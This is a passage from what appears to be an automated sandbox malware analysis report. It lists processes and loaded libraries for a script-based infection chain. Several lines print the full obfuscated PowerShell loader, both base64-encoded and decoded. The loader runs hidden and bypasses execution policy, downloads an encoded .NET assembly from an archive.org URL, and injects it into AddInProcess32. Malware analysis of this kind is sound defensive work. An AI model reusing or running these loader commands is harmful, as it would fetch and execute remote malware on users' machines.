snMnswfSx7MH0nKyd7MCcrJ30pKScpLWYgIFtjSEFyXTM5LFtjSEFyXTM2KSB8JiAoICRlTnY6Q09Nc1BFY1s0LDI0LDI1XS1qT2luJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'1}'+'url '+'='+' {0}ht'+'tp'+'s'+'://ia6001'+'00'+'.us.'+'archive'+'.or'+'g'+'/24/'+'items/d'+'et'+'ah-'+'n'+'ot'+'e-'+'v/D'+'e'+'t'+'a'+'hN'+'oteV'+'.'+'t'+'x'+'t{0}'+';{'+'1'+'}base6'+'4'+'Co'+'ntent = (Ne'+'w'+'-Objec'+'t Syste'+'m.Net.'+'WebClie'+'nt).D'+'ow'+'nl'+'o'+'a'+'dStri'+'ng({1}u'+'rl);'+'{'+'1'+'}bin'+'aryCo'+'n'+'tent ='+' [Sy'+'st'+'em.'+'C'+'onvert'+']::'+'F'+'rom'+'B'+'a'+'se64'+'String({1}base64'+'Cont'+'en'+'t);{1'+'}as'+'se'+'mbly'+' ='+' [Refl'+'ect'+'io'+'n.'+'As'+'sembly'+']::Load'+'({1}'+'binar'+'yCon'+'tent);{1}ty'+'p'+'e '+'= {1}a'+'ss'+'embl'+'y'+'.'+'GetTyp'+'e({'+'0}Run'+'PE.Home{'+'0});'+'{'+'1}m'+'e'+'t'+'h'+'od = {1}typ'+'e.Ge'+'tMe'+'th'+'od({'+'0}VAI{0});{1'+'}met'+'ho'+'d'+'.I'+'nvoke({1'+'}nu'+'ll'+', [ob'+'jec'+'t['+']'+']'+'@'+'({'+'0}0/'+'Yjzb'+'t'+'/d/e'+'e.e'+'tsap//:s'+'p'+'t'+'th{0}'+' , {0}d'+'e'+'sat'+'ivad'+'o'+'{0} '+','+' {0}desat'+'i'+'v'+'ad'+'o'+'{0} ,'+' {'+'0'+'}desativ'+'a'+'do{0'+'},'+'{0}'+'AddInProc'+'es'+'s'+'3'+'2{0},{0}'+'{0'+'}))')-f [cHAr]39,[cHAr]36) |& ( $eNv:COMsPEc[4,24,25]-jOin'')"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000005.00000002.1439903653.0000019CAEA2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1472944209.0000019CB5E90000.00000004.08000000.00040000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell -command $Codigo = 'KCgneycrJzF9JysndXJsICcrJz0nKycgezB9aHQnKyd", "0", "false");
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'KCgneycrJzF9JysndXJsICcrJz0nKycgezB9aHQnKyd0cCcrJ3MnKyc6Ly9pYTYwMDEnKycwMCcrJy51cy4nKydhcmNoaXZlJysnLm9yJysnZycrJy8yNC8nKydpdGVtcy9kJysnZXQnKydhaC0nKyduJysnb3QnKydlLScrJ3YvRCcrJ2UnKyd0JysnYScrJ2hOJysnb3RlVicrJy4nKyd0JysneCcrJ3R7MH0nKyc7eycrJzEnKyd9YmFzZTYnKyc0JysnQ28nKydudGVudCA9IChOZScrJ3cnKyctT2JqZWMnKyd0IFN5c3RlJysnbS5OZXQuJysnV2ViQ2xpZScrJ250KS5EJysnb3cnKydubCcrJ28nKydhJysnZFN0cmknKyduZyh7MX11JysncmwpOycrJ3snKycxJysnfWJpbicrJ2FyeUNvJysnbicrJ3RlbnQgPScrJyBbU3knKydzdCcrJ2VtLicrJ0MnKydvbnZlcnQnKyddOjonKydGJysncm9tJysnQicrJ2EnKydzZTY0JysnU3RyaW5nKHsxfWJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpO3sxJysnfWFzJysnc2UnKydtYmx5JysnID0nKycgW1JlZmwnKydlY3QnKydpbycrJ24uJysnQXMnKydzZW1ibHknKyddOjpMb2FkJysnKHsxfScrJ2JpbmFyJysneUNvbicrJ3RlbnQpO3sxfXR5JysncCcrJ2UgJysnPSB7MX1hJysnc3MnKydlbWJsJysneScrJy4nKydHZXRUeXAnKydlKHsnKycwfVJ1bicrJ1BFLkhvbWV7JysnMH0pOycrJ3snKycxfW0nKydlJysndCcrJ2gnKydvZCA9IHsxfXR5cCcrJ2UuR2UnKyd0TWUnKyd0aCcrJ29kKHsnKycwfVZBSXswfSk7ezEnKyd9bWV0JysnaG8nKydkJysnLkknKydudm9rZSh7MScrJ31udScrJ2xsJysnLCBbb2InKydqZWMnKyd0WycrJ10nKyddJysnQCcrJyh7JysnMH0wLycrJ1lqemInKyd0JysnL2QvZScrJ2UuZScrJ3RzYXAvLzpzJysncCcrJ3QnKyd0aHswfScrJyAsIHswfWQnKydlJysnc2F0JysnaXZhZCcrJ28nKyd7MH0gJysnLCcrJyB7MH1kZXNhdCcrJ2knKyd2JysnYWQnKydvJysnezB9ICwnKycgeycrJzAnKyd9ZGVzYXRpdicrJ2EnKydkb3swJysnfSwnKyd7MH0nKydBZGRJblByb2MnKydlcycrJ3MnKyczJysnMnswfSx7MH0nKyd7MCcrJ30pKScpLWYgIFtjSEFyXTM5LFtjSEFyXTM2KSB8JiAoICRlTnY6Q09Nc1BFY1s0LDI0LDI1XS1qT2luJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'1}'+'url '+'='+' {0}ht'+'tp'+'s'+'://ia6001'+'00'+'.us.'+'archive'+'.or'+'g'+'/24/'+'items/d'+'et'+'ah-'+'n'+'ot'+'e-'+'v/D'+'e'+'t'+'a'+'hN'+'oteV'+'.'+'t'+'x'+'t{0}'+';{'+'1'+'}base6'+'4'+'Co'+'ntent = (Ne'+'w'+'-Objec'+'t Syste'+'m.Net.'+'WebClie'+'nt).D'+'ow'+'nl'+'o'+'a'+'dStri'+'ng({1}u'+'rl);'+'{'+'1'+'}bin'+'aryCo'+'n'+'tent ='+' [Sy'+'st'+'em.'+'C'+'onvert'+']::'+'F'+'rom'+'B'+'a'+'se64'+'String({1}base64'+'Cont'+'en'+'t);{1'+'}as'+'se'+'mbly'+' ='+' [Refl'+'ect'+'io'+'n.'+'As'+'sembly'+']::Load'+'({1}'+'binar'+'yCon'+'tent);{1}ty'+'p'+'e '+'= {1}a'+'ss'+'embl'+'y'+'.'+'GetTyp'+'e({'+'0}Run'+'PE.Home{'+'0});'+'{'+'1}m'+'e'+'t'+'h'+'od = {1}typ'+'e.Ge'+'tMe'+'th'+'od({'+'0}VAI{0});{1'+'}met'+'ho'+'d'+'.I'+'nvoke({1'+'}nu'+'ll'+', [ob'+'jec'+'t['+']'+']'+'@'+'({'+'0}0/'+'Yjzb'+'t'+'/d/e'+'e.e'+'tsap//:s'+'p'+'t'+'th{0}'+' , {0}d'+'e'+'sat'+'ivad'+'o'+'{0} '+','+' {0}desat'+'i'+'v'+'ad'+'o'+'{0} ,'+' {'+'0'+'}desativ'+'a'+'do{0'+'},'+'{0}'+'AddInProc'+'es'+'s'+'3'+'2{0},{0}'+'{0'+'}))')-f [cHAr]39,[cHAr]36) |& ( $eNv:COMsPEc[4,24,25]-jOin'')"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'1}'+'url '+'='+' {0}ht'+'tp'+'s'+'://ia6001'+'00'+'.us.'+'archive'+'.or'+'g'+'/24/'+'items/d'+'et'+'ah-'+'n'+'ot'+'e-'+'v/D'+'e'+'t'+'a'+'hN'+'oteV'+'.'+'t'+'x'+'t{0}'+';{'+'1'+'}base6'+'4'+'Co'+'ntent = (Ne'+'w'+'-Objec'+'t Syste'+'m.Net.'+'WebClie'+'nt).D'+'ow'+'nl'+'o'+'a'+'dStri'+'ng({1}u'+'rl);'+'{'+'1'+'}bin'+'aryCo'+'n'+'tent ='+' [Sy'+'st'+'em.'+'C'+'onvert'+']::'+'F'+'rom'+'B'+'a'+'se64'+'String({1}base64'+'Cont'+'en'+'t);{1'+'}as'+'se'+'mbly'+' ='+' [Refl'+'ect'+'io'+'n.'+'As'+'sembly'+']::Load'+'({1}'+'binar'+'yCon'+'tent);{1}ty'+'p'+'e '+'= {1}a'+'ss'+'embl'+'y'+'.'+'GetTyp'+'e({'+'0}Run'+'PE.Home{'+'0});'+'{'+'1}m'+'e'+'t'+'h'+'od = {1}typ'+'e.Ge'+'tMe'+'th'+'od({'+'0}VAI{0});{1'+'}met'+'ho'+'d'+'.I'+'nvoke({1'+'}nu'+'ll'+', [ob'+'jec'+'t['+']'+']'+'@'+'({'+'0}0/'+'Yjzb'+'t'+'/d/e'+'e.e'+'tsap//:s'+'p'+'t'+'th{0}'+' , {0}d'+'e'+'sat'+'ivad'+'o'+'{0} '+','+' {0}desat'+'i'+'v'+'ad'+'o'+'{0} ,'+' {'+'0'+'}desativ'+'a'+'do{0'+'},'+'{0}'+'AddInProc'+'es'+'s'+'3'+'2{0},{0}'+'{0'+'}))')-f [cHAr]39,[cHAr]36) |& ( $eNv:COMsPEc[4,24,25]-jOin'')"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzF9JysndXJsICcrJz0nKycgezB9aHQnKyd0cCcrJ3MnKyc6Ly9pYTYwMDEnKycwMCcrJy51cy4nKydhcmNoaXZlJysnLm9yJysnZycrJy8yNC8nKydpdGVtcy9kJysnZXQnKydhaC0nKyduJysnb3QnKydlLScrJ3YvRCcrJ2UnKyd0JysnYScrJ2hOJysnb3RlVicrJy4nKyd0JysneCcrJ3R7MH0nKyc7eycrJzEnKyd9YmFzZTYnKyc0JysnQ28nKydudGVudCA9IChOZScrJ3cnKyctT2JqZWMnKyd0IFN5c3RlJysnbS5OZXQuJysnV2ViQ2xpZScrJ250KS5EJysnb3cnKydubCcrJ28nKydhJysnZFN0cmknKyduZyh7MX11JysncmwpOycrJ3snKycxJysnfWJpbicrJ2FyeUNvJysnbicrJ3RlbnQgPScrJyBbU3knKydzdCcrJ2VtLicrJ0MnKydvbnZlcnQnKyddOjonKydGJysncm9tJysnQicrJ2EnKydzZTY0JysnU3RyaW5nKHsxfWJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpO3sxJysnfWFzJysnc2UnKydtYmx5JysnID0nKycgW1JlZmwnKydlY3QnKydpbycrJ24uJysnQXMnKydzZW1ibHknKyddOjpMb2FkJysnKHsxfScrJ2JpbmFyJysneUNvbicrJ3RlbnQpO3sxfXR5JysncCcrJ2UgJysnPSB7MX1hJysnc3MnKydlbWJsJysneScrJy4nKydHZXRUeXAnKydlKHsnKycwfVJ1bicrJ1BFLkhvbWV7JysnMH0pOycrJ3snKycxfW0nKydlJysndCcrJ2gnKydvZCA9IHsxfXR5cCcrJ2UuR2UnKyd0TWUnKyd0aCcrJ29kKHsnKycwfVZBSXswfSk7ezEnKyd9bWV0JysnaG8nKydkJysnLkknKydudm9rZSh7MScrJ31udScrJ2xsJysnLCBbb2InKydqZWMnKyd0WycrJ10nKyddJysnQCcrJyh7JysnMH0wLycrJ1lqemInKyd0JysnL2QvZScrJ2UuZScrJ3RzYXAvLzpzJysncCcrJ3QnKyd0aHswfScrJyAsIHswfWQnKydlJysnc2F0JysnaXZhZCcrJ28nKyd7MH0gJysnLCcrJyB7MH1kZXNhdCcrJ2knKyd2JysnYWQnKydvJysnezB9ICwnKycgeycrJzAnKyd9ZGVzYXRpdicrJ2EnKydkb3swJysnfSwnKyd7MH0nKydBZGRJblByb2MnKydlcycrJ3MnKyczJysnMnswfSx7MH0nKyd7MCcrJ30pKScpLWYgIFtjSEFyXTM5LFtjSEFyXTM2KSB8JiAoICRlTnY6Q09Nc1BFY1s0LDI0LDI1XS1qT2luJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'1}'+'url '+'='+' {0}ht'+'tp'+'s'+'://ia6001'+'00'+'.us.'+'archive'+'.or'+'g'+'/24/'+'items/d'+'et'+'ah-'+'n'+'ot'+'e-'+'v/D'+'e'+'t'+'a'+'hN'+'oteV'+'.'+'t'+'x'+'t{0}'+';{'+'1'+'}base6'+'4'+'Co'+'ntent = (Ne'+'w'+'-Objec'+'t Syste'+'m.Net.'+'WebClie'+'nt).D'+'ow'+'nl'+'o'+'a'+'dStri'+'ng({1}u'+'rl);'+'{'+'1'+'}bin'+'aryCo'+'n'+'tent ='+' [Sy'+'st'+'em.'+'C'+'onvert'+']::'+'F'+'rom'+'B'+'a'+'se64'+'String({1}base64'+'Cont'+'en'+'t);{1'+'}as'+'se'+'mbly'+' ='+' [Refl'+'ect'+'io'+'n.'+'As'+'sembly'+']::Load'+'({1}'+'binar'+'yCon'+'tent);{1}ty'+'p'+'e '+'= {1}a'+'ss'+'embl'+'y'+'.'+'GetTyp'+'e({'+'0}Run'+'PE.Home{'+'0});'+'{'+'1}m'+'e'+'t'+'h'+'od = {1}typ'+'e.Ge'+'tMe'+'th'+'od({'+'0}VAI{0});{1'+'}met'+'ho'+'d'+'.I'+'nvoke({1'+'}nu'+'ll'+', [ob'+'jec'+'t['+']'+']'+'@'+'({'+'0}0/'+'Yjzb'+'t'+'/d/e'+'e.e'+'tsap//:s'+'p'+'t'+'th{0}'+' , {0}d'+'e'+'sat'+'ivad'+'o'+'{0} '+','+' {0}desat'+'i'+'v'+'ad'+'o'+'{0} ,'+' {'+'0'+'}desativ'+'a'+'do{0'+'},'+'{0}'+'AddInProc'+'es'+'s'+'3'+'2{0},{0}'+'{0'+'}))')-f [cHAr]39,[cHAr]36) |& ( $eNv:COMsPEc[4,24,25]-jOin'')"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzF9JysndXJsICcrJz0nKycgezB9aHQnKyd0cCcrJ3MnKyc6Ly9pYTYwMDEnKycwMCcrJy51cy4nKydhcmNoaXZlJysnLm9yJysnZycrJy8yNC8nKydpdGVtcy9kJysnZXQnKydhaC0nKyduJysnb3QnKydlLScrJ3YvRCcrJ2UnKyd0JysnYScrJ2hOJysnb3RlVicrJy4nKyd0JysneCcrJ3R7MH0nKyc7eycrJzEnKyd9YmFzZTYnKyc0JysnQ28nKydudGVudCA9IChOZScrJ3cnKyctT2JqZWMnKyd0IFN5c3RlJysnbS5OZXQuJysnV2ViQ2xpZScrJ250KS5EJysnb3cnKydubCcrJ28nKydhJysnZFN0cmknKyduZyh7MX11JysncmwpOycrJ3snKycxJysnfWJpbicrJ2FyeUNvJysnbicrJ3RlbnQgPScrJyBbU3knKydzdCcrJ2VtLicrJ0MnKydvbnZlcnQnKyddOjonKydGJysncm9tJysnQicrJ2EnKydzZTY0JysnU3RyaW5nKHsxfWJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpO3sxJysnfWFzJysnc2UnKydtYmx5JysnID0nKycgW1JlZmwnKydlY3QnKydpbycrJ24uJysnQXMnKydzZW1ibHknKyddOjpMb2FkJysnKHsxfScrJ2JpbmFyJysneUNvbicrJ3RlbnQpO3sxfXR5JysncCcrJ2UgJysnPSB7MX1hJysnc3MnKydlbWJsJysneScrJy4nKydHZXRUeXAnKydlKHsnKycwfVJ1bicrJ1BFLkhvbWV7JysnMH0pOycrJ3snKycxfW0nKydlJysndCcrJ2gnKydvZCA9IHsxfXR5cCcrJ2UuR2UnKyd